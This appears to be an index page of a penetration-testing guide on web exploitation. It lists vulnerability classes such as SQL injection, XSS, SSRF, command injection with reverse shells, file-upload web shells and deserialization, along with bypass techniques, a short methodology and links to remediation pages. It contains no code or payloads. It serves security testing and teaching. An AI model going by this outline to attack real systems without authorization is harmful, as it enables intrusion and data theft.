Web Exploitation

This phase covers active exploitation of identified vulnerabilities to demonstrate impact and gain access to the target application or underlying systems. Each vulnerability type has its own comprehensive guide with detailed techniques, automation scripts, and practice labs.

Warning

Always ensure you have proper authorization before attempting any exploitation techniques. Document all actions taken for the final report.

Exploitation Guides

SQL Injection

Union-based, blind Boolean/time-based, error-based SQLi. WAF bypasses and database-specific payloads.

MySQL PostgreSQL MSSQL Oracle

Cross-Site Scripting (XSS)

Reflected, stored, and DOM-based XSS. Filter bypasses, CSP evasion, and BeEF integration.

Reflected Stored DOM

Cross-Site Request Forgery

CSRF token bypass, SameSite cookie bypass, JSON CSRF, and PoC generation.

Token Bypass SameSite JSON

File Upload Attacks

Web shell uploads, extension bypasses, magic byte manipulation, and polyglot files.

PHP JSP ASP Polyglot

Server-Side Request Forgery

Internal network scanning, cloud metadata exploitation, DNS rebinding, and protocol smuggling.

AWS GCP Azure

OS Command Injection

Command separators, blind injection, filter bypasses, and reverse shells for Linux/Windows.

Linux Windows Reverse Shell

XML External Entity (XXE)

File disclosure, SSRF via XXE, blind XXE with OOB exfiltration, and SVG/DOCX injection.

File Read Blind OOB SAML

Authentication Bypass

Default credentials, SQLi login bypass, JWT attacks, 2FA bypass, and OAuth/SAML attacks.

JWT 2FA OAuth SAML

Server-Side Template Injection

Jinja2, Twig, Freemarker exploitation. Template detection, RCE payloads, and filter bypasses.

Jinja2 Twig Freemarker

Path Traversal / LFI / RFI

Directory traversal, local/remote file inclusion, PHP wrappers, and log poisoning.

LFI RFI PHP Wrappers

Insecure Deserialization

Java (ysoserial), PHP (phpggc), Python (pickle), and .NET gadget chains with exploitation.

Java PHP Python .NET

IDOR

Horizontal/vertical privilege escalation, GUID prediction, parameter tampering, and automation.

Horizontal Vertical Autorize

NoSQL Injection

MongoDB operator injection, authentication bypass, data extraction, and blind injection.

MongoDB CouchDB Redis

Open Redirect

URL validation bypasses, OAuth token theft, SSRF chains, and phishing enhancement.

OAuth SSRF Chain Phishing

Business Logic Vulnerabilities

Workflow bypass, race conditions, payment manipulation, and rate limiting bypass.

Workflow Race Conditions Payment Logic

Quick Reference

Exploitation Methodology

  1. Identify vulnerability type - Confirm the vulnerability exists and understand its nature
  2. Research exploitation techniques - Use the detailed guides above for specific attack vectors
  3. Develop/customize payloads - Adapt payloads to bypass any security controls
  4. Demonstrate impact - Show real-world consequences (data access, RCE, etc.)
  5. Document everything - Screenshot evidence, save payloads, note exact steps

Information

Documentation is Key: Screenshot every successful exploitation attempt, note the exact payload used, and document the impact clearly for the final report.

Related Topics

Injection Remediation

Fix SQL and command injection vulnerabilities

XSS Remediation

Prevent cross-site scripting attacks

CSRF Remediation

Implement anti-CSRF protections

Access Control Remediation

Fix broken access control issues

Burp Suite Cheatsheet

Web testing proxy commands

SQLMap Cheatsheet

Automated SQL injection tool